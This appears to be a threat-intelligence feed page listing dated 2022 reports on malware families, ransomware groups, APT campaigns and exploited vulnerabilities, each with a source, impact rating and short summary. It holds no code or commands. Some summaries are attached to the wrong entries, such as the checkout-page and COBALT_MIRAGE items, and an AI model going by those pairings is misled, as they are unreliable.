Threat_Actors_exploiting_VMware_vulnerability
Medium
+
—
- Intel Source:
- CISA
- Intel Name:
- Threat_Actors_exploiting_VMware_vulnerability
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- CISA released an advisory to warn organizations about threat actors exploiting unpatched VMware vulnerabilities. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.
All_about_ITG23_Crypters
Medium
+
—
- Intel Source:
- Security Intelligence
- Intel Name:
- All_about_ITG23_Crypters
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- IBM X-Force researchers analyzed thirteen crypters that have all been used with malware built or operated by ITG23 internal teams or third-party distributors — including Trickbot, BazarLoader, Conti, and Colibri.
BumbleBee_Malware_getting_delivered_via_TransferXL_Urls
Low
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- BumbleBee_Malware_getting_delivered_via_TransferXL_Urls
- Date of Scan:
- 2022-05-20
- Impact:
- Low
- Summary:
- Researchers at ISC.SANS were able to relate Bumblebee malware with EXOTIC LILY threat actor, as they saw usage of active TransferXL URLs delivering ISO files for Bumblebee malware.
Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms
Medium
+
—
- Intel Source:
- PtSecurity
- Intel Name:
- Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Analysts at Positive Technologies came across a previously unknown Chinese hacking group known as 'Space Pirates' targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems. They have dubbed the threat actor Space Pirates.
Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity
Medium
+
—
- Intel Source:
- WeiXin
- Intel Name:
- Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Researchers from 360 Threat Intelligence Center came across an attack activity launched by APT-C-24/Sidewinder in which the threat actor has come up with New TTP.
Lazarus_Group_Exploiting_Log4Shell_Vulnerability
Medium
+
—
- Intel Source:
- Asec
- Intel Name:
- Lazarus_Group_Exploiting_Log4Shell_Vulnerability
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Researchers from ASEC discovered Lazarus group distributing NukeSped by exploiting Log4Shell vulnerability. The threat actor used the log4j vulnerability on VMware Horizon products that were not applied with the security patch.
VMware_Bugs_Abused_to_Deliver_Mirai
Medium
+
—
- Intel Source:
- Barracuda
- Intel Name:
- VMware_Bugs_Abused_to_Deliver_Mirai
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Barracuda discovered that attempts were made to exploit the recent vulnerabilities CVE-2022-22954 and CVE-2022-22960. Mirai was getting delivered by abusing the VMware Bug.
Threat Actors targets US Business Online Checkout Page
Medium
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Threat Actors targets US Business Online Checkout Page
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Palo Alto Networks documented the background on Emotet, its activity since november 2021 and ending with January 2022.
Emotet_The_journey
Medium
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Emotet_The_journey
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Palo Alto Networks documented the background on Emotet, its activity since november 2021 and ending with January 2022.
Uncovering_Kingminer_Botnet_Attack
Low
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Uncovering_Kingminer_Botnet_Attack
- Date of Scan:
- 2022-05-18
- Impact:
- Low
- Summary:
- Researchers from Trend Micro details about the TTPs of the Kinginer Botnet. In 2020 threat actors deployed Kingminer to target SQL servers for cryptocurrency mining.
Wizard_Spider_Group_In_Depth_Analysis
Medium
+
—
- Intel Source:
- Prodaft
- Intel Name:
- Wizard_Spider_Group_In_Depth_Analysis
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from PRODAFT published the results of an investigation into Wizard Spider, believed to either be or be associated with the Grim Spider and Lunar Spider hacking groups.
Chaos_Ransomware_stands_with_Russia
Medium
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Chaos_Ransomware_stands_with_Russia
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- FortiGuard Labs came across a variant of the Chaos ransomware that appears to side with Russia. This variant of the ransomware have been leveraginhg Russia Ukraine conflict.
Operation RestyLink targeting Japenese Firms
Medium
+
—
- Intel Source:
- NTT Security
- Intel Name:
- Operation RestyLink targeting Japenese Firms
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from NTT security observed APT campaign targeting Japanese companies starting from mid of April 2022. The initial attack vector in this campaign was spear phishing email.
RansomEXX_and_its_TTPs
Medium
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- RansomEXX_and_its_TTPs
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from TrendMicro sheds light on the Tactics and Techniques of ransomware variant called RansomEXX which have been active since 2020.
X_Cart_Skimmer_with_DOM_based_Obfuscation
Low
+
—
- Intel Source:
- Sucuri
- Intel Name:
- X_Cart_Skimmer_with_DOM_based_Obfuscation
- Date of Scan:
- 2022-05-18
- Impact:
- Low
- Summary:
- Security researcher from Sucuri worked on an infected X-Cart website and found two interesting credit card stealers there — one skimmer located server-side, the other client-side.
UpdateAgent_Returns_with_New_macOS_Malware_Dropper
Low
+
—
- Intel Source:
- Jamf
- Intel Name:
- UpdateAgent_Returns_with_New_macOS_Malware_Dropper
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from Jamf Threat Labs came across a new variant of the macOS malware tracked as UpdateAgent. The malware relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server.
Analysis_of_the_HUI_Loader
Low
+
—
- Intel Source:
- JPCERT
- Intel Name:
- Analysis_of_the_HUI_Loader
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- JPCERT researchers shared their analysis of the HUI Loader which has been used by multiple attack groups since around 2015, also the malware have been used by APT10.
Custom_PowerShell_RAT_targets_Germans
Low
+
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Custom_PowerShell_RAT_targets_Germans
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from MalwareBytes came across a new campaign that plays on concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine and later infecting the victims with RAT.
UN_social_program_themed_online_fraud
Medium
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- UN_social_program_themed_online_fraud
- Date of Scan:
- 2022-05-17
- Impact:
- Medium
- Summary:
- CERT-UA researchers recently responded to discovery of fraudulent page on facebook that mimics the resource of the TV channel "TSN".
Onyx_Ransomware
Low
+
—
- Intel Source:
- Cyfirma
- Intel Name:
- Onyx_Ransomware
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from Cyfirma analyzed samples of a new ransomware called Onyx which was first seen in April 2022. This ransomware encrypts files and then modifies their filenames by appending the .ampkcz extension.
Malicious_HTML_Help_File_Delivering_Agent_Tesla
Low
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Malicious_HTML_Help_File_Delivering_Agent_Tesla
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Unit 42 researchers observed an attack utilizing malicious compiled HTML help files for the initial delivery. The method was used to deliver Agent Tesla.
APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe
Medium
+
—
- Intel Source:
- Cluster25
- Intel Name:
- APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe
- Date of Scan:
- 2022-05-16
- Impact:
- Medium
- Summary:
- Cluster25 researchers analyzed several spear-phishing campaigns linked to APT29 that involve the usage of a side-loaded DLL through signed software (like Adobe suite) and legitimate webservices (like Dropbox) as communication vector for Command and Control (C&C).
Quantum_Locker_Ransomware
Medium
+
—
- Intel Source:
- Cybereason
- Intel Name:
- Quantum_Locker_Ransomware
- Date of Scan:
- 2022-05-16
- Impact:
- Medium
- Summary:
- Researchers at Cybereason analyzed Quantum Locker ransomware and demonstrated its detection and prevention. The initial infection method used by the operators is infamous malware called IceID.
KurayStealer_Malware
Low
+
—
- Intel Source:
- Uptycs
- Intel Name:
- KurayStealer_Malware
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers at Uptycs came across a new malware builder dubbed as KurayStealer that has password stealing and screenshot capabilities.The malware harvests the passwords and screenshots and sends them to the attackers’ Discord channel via webhooks.
From_0_Day_to_Mirai
High
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_0_Day_to_Mirai
- Date of Scan:
- 2022-05-16
- Impact:
- High
- Summary:
- Researchers at ISC.SANS found attacks exploiting the recent high severity vulnerability in F5 products and were able to attribute the attacks to Mirai.
Telegram_used_to_spread_Eternity_Malware
Low
+
—
- Intel Source:
- Cyble
- Intel Name:
- Telegram_used_to_spread_Eternity_Malware
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers from Cyble came across a new malware service, dubbed the Eternity Project by the threat actors behind it, allows cybercriminals to target potential victims with a customized threat offering based on individual modules.
Novel IceApple Post-Exploitation Framework
Low
+
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Novel IceApple Post-Exploitation Framework
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers from CrowdStrike found New ‘post-exploitation’ threat getting deployed on Microsoft Exchange servers. The threat has been dubbed as IceApple.
APT34_targets_Jordan_Government_using_new_Saitama_backdoor
Medium
+
—
- Intel Source:
- MalwareBytes
- Intel Name:
- APT34_targets_Jordan_Government_using_new_Saitama_backdoor
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- Researchers at Malwarebytes have discovered a malicious email targeting a government official at Jordan’s foreign ministry and researchers identified a suspicious message on April 26. It contained a malicious Excel document that delivered Saitama - a new hacking tool used to provide a backdoor into systems. Malwarebytes attributed the email to a threat group commonly known as APT34.
RedLine_Stealer_Campaign_spread_via_Github_hosted_payload
Medium
+
—
- Intel Source:
- NetSkope
- Intel Name:
- RedLine_Stealer_Campaign_spread_via_Github_hosted_payload
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- Researchers at NetSpoke Threat Labs has discovered a new RedLine Stealer campaign spread on YouTube, using a fake bot to buy Mystery Box NFT from Binance. The video description leads the victim to download the fake bot which is hosted on GitHub.
Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC
Low
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC
- Date of Scan:
- 2022-05-13
- Impact:
- Low
- Summary:
- Researchers at Fortinet's FortiGaurd Labs has analysed a phishing campaign that was delivering three fileless malware onto a victim’s device. Once executed, Malware are able to steal sensitive information from that device. It is majorly affecting Microsoft Windows platform users.
Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US
Medium
+
—
- Intel Source:
- SecureWorks
- Intel Name:
- Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- SecureWorks Counter Threat Unit has analysed REvil ransomware samples and this has resumed operations of GOLD SOUTHFIELD. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.
UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware
Medium
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- CERT-UA has analysed a phishing campaign with a subject as "On revenge in Kherson!" and containing an attachment in the form of a file "Plan Kherson.htm". The campaign is using a malicious program GammaLoad.PS1_v2 and attributed to a group called UAC-0010 (Armageddon).
TA578_distributing_Bumblebee_malware
Medium
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- TA578_distributing_Bumblebee_malware
- Date of Scan:
- 2022-05-12
- Impact:
- Medium
- Summary:
- Researchers at ISC.SANS has analysed a campaign where threat actor TA578 leveraging thread-hijacked emails to push ISO files for Bumblebee malware. These threat-hijacked emails either have links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign.
Critical_F5_BIG_IP_Vulnerability_New_IoCs
High
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Critical_F5_BIG_IP_Vulnerability_New_IoCs
- Date of Scan:
- 2022-05-12
- Impact:
- High
- Summary:
- Researchers from PaloAlto have also released few indicators of compromise and their view on Critical F5 BIG-IP Vulnerability.
Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK
Low
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK
- Date of Scan:
- 2022-05-12
- Impact:
- Low
- Summary:
- Proofpoint researchers found previously undocumented remote access trojan (RAT) called Nerbian RAT written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K.
Bitter APT expands its target list
Medium
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Bitter APT expands its target list
- Date of Scan:
- 2022-05-12
- Impact:
- Medium
- Summary:
- An espionage-focused threat actor(Bitter APT) known for targeting China, Pakistan, and Saudi Arabia has included Bangladeshi government organizations as part of an ongoing campaign.
Malicious_NPM_Packages_targets_German_Companies
Low
+
—
- Intel Source:
- JFrog
- Intel Name:
- Malicious_NPM_Packages_targets_German_Companies
- Date of Scan:
- 2022-05-12
- Impact:
- Low
- Summary:
- Researchers from Jfrog have discovered a number of malicious packages in the NPM registry specifically targeting a number of prominent companies based in Germany to carry out supply chain attacks.
Examining_BlackBasta_ransomware
Medium
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Examining_BlackBasta_ransomware
- Date of Scan:
- 2022-05-11
- Impact:
- Medium
- Summary:
- TrendMicro researchers have examined the whole infection routine of Black Basta ransomware and its infection tactics.
German_Automakers_targeted_by_InfoStealer_campaign
Low
+
—
- Intel Source:
- checkpoint
- Intel Name:
- German_Automakers_targeted_by_InfoStealer_campaign
- Date of Scan:
- 2022-05-11
- Impact:
- Low
- Summary:
- Checkpoint researchers discovered A years-long phishing campaign has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.
REvil_returns_reemergening_GOLD_SOUTHFIELD
High
+
—
- Intel Source:
- SecureWorks
- Intel Name:
- REvil_returns_reemergening_GOLD_SOUTHFIELD
- Date of Scan:
- 2022-05-11
- Impact:
- High
- Summary:
- SecureWorks Counter Threat Unit has analysed REvil ransomware samples and this has resumed operations of GOLD SOUTHFIELD. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.
Different_elements_of_Cobalt_Strike
Medium
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Different_elements_of_Cobalt_Strike
- Date of Scan:
- 2022-05-11
- Impact:
- Medium
- Summary:
- Palo Alto Unit42 researchers has analysed Cobalt Strike tool and gone through the encoding algorithm, describe definitions and differences of encoding types used in the Cobalt Strike framework, and cover some malicious attacks seen in the wild.
New_Wave_of_Ursnif_Malware
High
+
—
- Intel Source:
- Qualys
- Intel Name:
- New_Wave_of_Ursnif_Malware
- Date of Scan:
- 2022-05-11
- Impact:
- High
- Summary:
- Researchers at Qualys has discovered and analysed few phishing emails with a macro embedded XLS attachment or a zip attachment containing an HTA file initiated the infection chain. This targeted attack researchers attributed to Ursnif malware which is one of the most widespread banking trojans.
SunnyDay Ransomware
LOW
+
—
- Intel Source:
- Seguranca-Informatica
- Intel Name:
- SunnyDay Ransomware
- Date of Scan:
- 2022-04-19
- Impact:
- LOW
- Summary:
- Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result of the work some similarities between other ransomware samples such as Ever101 Medusa Locker Curator and Payment45 were found. According to the analysis “SunnyDay is a simple piece of ransomware based on the SALSA20 stream cipher”. SALSA20 is easy to recognize as it uses well-known values for its internal cryptographic operations.
Coordinated disruption of Zloader operation
LOW
+
—
- Intel Source:
- Microsoft/ESET
- Intel Name:
- Coordinated disruption of Zloader operation
- Date of Scan:
- 2022-04-19
- Impact:
- LOW
- Summary:
- DCU unit from Microsoft have taken technical action against Zloader and have disrupted their operations.ZLoader is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money.
Lazarus Group Targets Chemical Sector
MEDIUM
+
—
- Intel Source:
- Symantec
- Intel Name:
- Lazarus Group Targets Chemical Sector
- Date of Scan:
- 2022-04-19
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have observed Lazarus group conducting an espionage campaign targeting organizations operating within the chemical sector. This campaign has been dubbed Operation Drem Job.
Recent Emotet Maldoc Outbreak
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Recent Emotet Maldoc Outbreak
- Date of Scan:
- 2022-04-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet has identified a recent Emotet outbreak is being spread through a variety of malicious Microsoft Office files or maldocs attached to phishing emails. Once a victim opens the attached document a VBA Macro or Excel 4.0 Macro is used to execute malicious code that downloads and runs the Emotet malware.
XSS Vulnerability in Zimbra leveraged to target Ukraine Government
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- XSS Vulnerability in Zimbra leveraged to target Ukraine Government
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- CERT-UA has detected threat actors are targeting Ukrainian government agencies with new attacks exploiting Zimbra XSS Vulnerability (CVE-2018-6882). CERT-UA has attributed this campaign to UAC-0097 a currently unknown actor.
CVE_2022_24527_Seeder_Queries_14042022
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- CVE_2022_24527_Seeder_Queries_14042022
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Indepth analysis of PYSA Ransomware Group
MEDIUM
+
—
- Intel Source:
- Prodaft
- Intel Name:
- Indepth analysis of PYSA Ransomware Group
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at PRODAFT has identified and gained visibility into PYSA's ransomware infrastructure and analyzed its findings to gain insight into how the criminal operation works.
BumbleBee Malware campaign
LOW
+
—
- Intel Source:
- Cynet
- Intel Name:
- BumbleBee Malware campaign
- Date of Scan:
- 2022-04-18
- Impact:
- LOW
- Summary:
- Researchers from Cynet Security found a new campaign which instead of using malicious office documents is using malicious ISO image files luring victims to execute the BumbleBee malware.
New Fodcha DDoS botnet
MEDIUM
+
—
- Intel Source:
- netlab360
- Intel Name:
- New Fodcha DDoS botnet
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Qihoo 360's Network Security Research Lab has discovered a new DDoS botnet called 'Fodcha'. The Botnet has spread to over 62 000 devices between March 29 and April 10. The number of unique IP addresses linked to the botnet that researchers are tracking is10 000-strong Fodcha army of bots using Chinese IP addresses every day.
CVE_2022_22954_Seeder_Queries_14042022
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- CVE_2022_22954_Seeder_Queries_14042022
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Emotet Modules and Recent Attacks
MEDIUM
+
—
- Intel Source:
- SecureList
- Intel Name:
- Emotet Modules and Recent Attacks
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Kaspersky were able to etrieve 10 of the 16 modules used by Emotet for Credential/Password/Account/E-mail stealing and spamming. Also the statistics on recent Emotet attacks were also shared.
New File extensions added to BlackCat ransomware's arsenal
MEDIUM
+
—
- Intel Source:
- SecureList
- Intel Name:
- New File extensions added to BlackCat ransomware's arsenal
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureList has analysed BlackCat Ransomware Group's activities since its inception. They are also comparing BlackCat TTPs with BlackMatter Group like a custom exflitration tool called 'Fendr' previously been used exclusively in BlackMatter ransomware activity.
Enemybot leveraged by Keksec group
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Enemybot leveraged by Keksec group
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers at FortiGuard Labs have identified a new DDoS botnet called “Enemybot” and attributed it to a threat group called 'Keksec' that specializes in cryptomining and DDoS attacks. This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
Critical Remote Code Execution Vulnerability in Windows RPC Runtime
HIGH
+
—
- Intel Source:
- Microsoft
- Intel Name:
- Critical Remote Code Execution Vulnerability in Windows RPC Runtime
- Date of Scan:
- 2022-04-14
- Impact:
- HIGH
- Summary:
- Microsoft’s April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492 CVE-2022-24528 and CVE-2022-26809. By exploiting these vulnerabilities a remote unauthenticated attacker can execute code on the vulnerable machine with the privileges of the RPC service which depends on the process hosting the RPC runtime.
Virus/XLS Xanpei Infecting Excel Files
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Virus/XLS Xanpei Infecting Excel Files
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- ASEC Research team have identified a constant distribution of malware strains that spread the infection when Excel file is opened. Upon opening the infected Excel file the file containing virus VBA code is dropped to Excel startup path. And when any Excel file is opened the malicious file dropped in Excel startup path is automatically executed to infect with virus and perform additional malicious behaviors.
IcedID malware targeting Ukraine state bodies
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- IcedID malware targeting Ukraine state bodies
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA has issued a new heads-up that warns of an ongoing cyber-attack leveraging the infamous IcedID malware designed to compromise Ukrainian state bodies. The detected malware also dubbed as BankBot or BokBot is a banking Trojan primarily designed to target financial data and steal banking credentials.
ZingoStealer by Haskers Group
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- ZingoStealer by Haskers Group
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos has identified a new information stealer called 'ZingoStealer' that has been released for free by a threat actor known as 'Haskers Gang.' This information stealer first introduced to the wild in March 2022 is currently undergoing active development and multiple releases of new versions have been observed recently.
Malware Campaigns Targeting African Banking Sector
MEDIUM
+
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- Malware Campaigns Targeting African Banking Sector
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers from HP Wolf Security have been tracking the campaign since early 2022 an employee of an unnamed West African bank received an email purporting to be from a recruiter at another African bank with information about job opportunities. A cybercrime campaign targeting the African banking sector is leveraging phishing emails and HTML smuggling techniques to deploy malware.
OldGremlin Gang resumes attack with new methods
MEDIUM
+
—
- Intel Source:
- Group-IB
- Intel Name:
- OldGremlin Gang resumes attack with new methods
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Group-IB has uncovered new attacks tools and methods used by OldGremlin Ransomware Group. In spring 2020 Group was first identified by Group-IB researchers over the past two years OldGremlin has conducted 13 malicious email campaigns. Researchers also discovered two variants of TinyFluff malware an earlier one that is more complex and a newer simplified version that copies the script and the Node.js interpreter from its storage location.
SystemBC Malware
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- SystemBC Malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- ASEC Research team have identified a proxy malware called SystemBC that has been used by various attackers for the last few years. While it is recently distributed through SmokeLoader or Emotet this malware has steadily been used in various ransomware attacks in the past.
NetSupport RAT_Seeder_Queries_08/04/2022
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- NetSupport RAT_Seeder_Queries_08/04/2022
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
New version of SolarMarker Malware
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- New version of SolarMarker Malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- A new version of SolarMarker a malware family known for its infostealing and backdoor capabilities has been identified by Palo Alto Networks and is believed to be active as of April 2022. This malware has been prevalent since September 2020 targeting U.S. organizations and part of the infrastructure is still active as of 2022 in addition to a new infrastructure that attackers have recently deployed.
Fake COVID-19 forms targeting companies
MEDIUM
+
—
- Intel Source:
- Cofense
- Intel Name:
- Fake COVID-19 forms targeting companies
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Cofense Phishing Defense Center has analysed a phishing campaign where threat actors impersonate companies to send out fake COVID-19 forms. CPDC team saw a phishing email masquerading as a general office wide email claiming someone in the building has been infected with COVID-19 and asking to review the company policy.
Bahamut group recent attacks
MEDIUM
+
—
- Intel Source:
- 360 Beacon Lab
- Intel Name:
- Bahamut group recent attacks
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Researcher at 360 Beacon Lab has identifed a suspected mobile terminal attack activity of Bahamut group. Bahamut is an advanced threat group targeting the Middle East and South Asia. Group mainly uses phishing websites fake news websites and social networking sites to attack.
MoqHao Malware targeting European countries
LOW
+
—
- Intel Source:
- TeamCymru
- Intel Name:
- MoqHao Malware targeting European countries
- Date of Scan:
- 2022-04-12
- Impact:
- LOW
- Summary:
- Researchers at TeamCymru has examined the current target base of Roaming Mantis group where the group is levearging MoqHao malware to target European countries. MoqHao is generally used to target Android users often via an initial attack vector of smishing.
Tarrask - HAFNIUM APT defense evasion malware
MEDIUM
+
—
- Intel Source:
- Microsoft
- Intel Name:
- Tarrask - HAFNIUM APT defense evasion malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence Center has tracked the Chinese-backed Hafnium hacking group and identified that the group has been linked to a piece of a new malware that's used to maintain persistence on compromised Windows environments. MSTIC has dubbed the defense evasion malware 'Tarrask ' characterized it as a tool that creates 'hidden' scheduled tasks on the system.
EvilNominatus Ransomware
LOW
+
—
- Intel Source:
- ClearSky
- Intel Name:
- EvilNominatus Ransomware
- Date of Scan:
- 2022-04-12
- Impact:
- LOW
- Summary:
- Researchers at ClearSky has detected a malicious BAT file that was uploaded to VirusTotal from Iran. This file executes a ransomware that was associated with the EvilNominatus ransomware initially exposed at the end of 2021. Researchers believe that the ransomware’s developer is a young Iranian who bragged about its development on Twitter.
Sandworm Group (UAC-0082) targetiing Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- Sandworm Group (UAC-0082) targetiing Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- CERT-UA has taken urgent measures to respond to an information security incident related to a targeted attack on Ukraine's energy facility.
FFDroider Stealer Targeting Social Media Platforms
LOW
+
—
- Intel Source:
- Zscaler
- Intel Name:
- FFDroider Stealer Targeting Social Media Platforms
- Date of Scan:
- 2022-04-11
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have discovered many new types of stealer malwares across different attack campaigns including a novel windows based malware creating a registry key dubbed FFDroider which is designed to send stolen credentials and cookies to C&C server.
Multiple cyber espionage operations disrupted
MEDIUM
+
—
- Intel Source:
- Intel Name:
- Multiple cyber espionage operations disrupted
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Meta has shared their Adversarial Threat report in which they provide a broader view into the cyber threats Facebook observes in Iran Azerbaijan Ukraine Russia South America and the Philippines.
DPRK-Nexus threat actor spear-phishing campaign
LOW
+
—
- Intel Source:
- Cluster25
- Intel Name:
- DPRK-Nexus threat actor spear-phishing campaign
- Date of Scan:
- 2022-04-11
- Impact:
- LOW
- Summary:
- Researchers at Cluster25 has identified a recent activity that started in early days of April 2022 from a DPRK-nexus threat actor using spear-phishing emails containing korean-based malicious documents with different lures to compromise its victims.
Denonia Malware specifically targeting AWS Lambda
MEDIUM
+
—
- Intel Source:
- Cado security
- Intel Name:
- Denonia Malware specifically targeting AWS Lambda
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Researchers from Cado Security published their findings on a new malware called 'Denonia' variant that targets AWS Lambda. After further investigation the researchers found the sample was a 64-bit ELF executable. The malware also relies on third-party GitHub libraries including those for writing Lambda functions and retrieving data from Lambda invoke requests.
Mirai Botnet exploiting Spring4Shell Vulnerability
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Mirai Botnet exploiting Spring4Shell Vulnerability
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Trend Micro Research team has confirmed on some earlier reports that the new Spring4Shell vulnerability has been exploited by the Mirai Botnet. The Mirai sample is downloaded to the ‘/tmp’ folder and executed after permission change to make them executable using ‘chmod’.
Remcos RAT phishing campaign
LOW
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Remcos RAT phishing campaign
- Date of Scan:
- 2022-04-08
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs share their analysis of the Remcos RAT being used by malicious actors to control victims’ devices delivered by a phishing campaign.
Parrot TDS takes over compromised websites
MEDIUM
+
—
- Intel Source:
- Avast
- Intel Name:
- Parrot TDS takes over compromised websites
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Avast researchers has published a report stating that a new traffic direction system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch further malicious campaigns. The TDS has infected various web servers hosting more than 16 500 websites ranging from adult content sites personal websites university sites and local government sites.
Operation Bearded Barbie
MEDIUM
+
—
- Intel Source:
- Cybereason
- Intel Name:
- Operation Bearded Barbie
